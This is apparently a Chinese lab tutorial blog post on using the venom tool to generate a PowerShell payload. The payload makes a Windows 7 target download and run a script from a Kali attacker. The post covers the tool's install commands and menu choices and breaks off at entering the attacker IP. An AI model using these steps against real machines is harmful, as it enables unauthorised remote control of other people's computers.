![034d35f8f365e6c87f2462fb3583af11.png](https://img-blog.csdnimg.cn/img_convert/034d35f8f365e6c87f2462fb3583af11.png)
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。
——百度百科
主思路
让目标机器从服务器上远程下载powershell脚本并执行,从而完全控制目标主机。
环境
- 攻击机:kali linux(IP地址:192.168.96.128)
- 靶机:win7 专业版(IP地址:192.168.96.130)
工具:venom
项目地址:
r00t-3xp10it/venomgithub.com![e9ee7e084f33d6106b1fc4d46a268ff6.png](https://img-blog.csdnimg.cn/img_convert/e9ee7e084f33d6106b1fc4d46a268ff6.png)
安装:
1.git clone https://github.com/r00t-3xp10it/venom
2.
`cd venom`
`sudo chmod -R +x *.sh`
`sudo chmod -R +x *.py
3.
`cd aux`
`sudo ./setup.sh`
1.制作powershell脚本
运行venom
./venom
然后我们选择第2项
![47ec7c6b2336fbb89809a1ceddb4a164.png](https://img-blog.csdnimg.cn/img_convert/47ec7c6b2336fbb89809a1ceddb4a164.png)
然后我们选择是10,输出一个powershell脚本
![4da66462ec7a0bc0978890095a349850.png](https://img-blog.csdnimg.cn/img_convert/4da66462ec7a0bc0978890095a349850.png)
输入攻击机的IP地址